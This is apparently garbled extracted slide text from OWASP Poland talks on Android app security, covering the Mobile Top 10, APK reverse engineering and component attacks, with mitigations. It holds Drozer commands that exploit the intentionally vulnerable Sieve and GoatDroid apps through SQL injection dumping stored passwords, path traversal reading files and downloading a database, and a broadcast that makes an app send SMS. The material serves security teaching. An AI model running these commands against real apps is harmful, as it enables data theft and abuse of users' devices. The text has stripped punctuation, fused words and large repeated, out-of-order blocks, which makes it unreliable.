bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
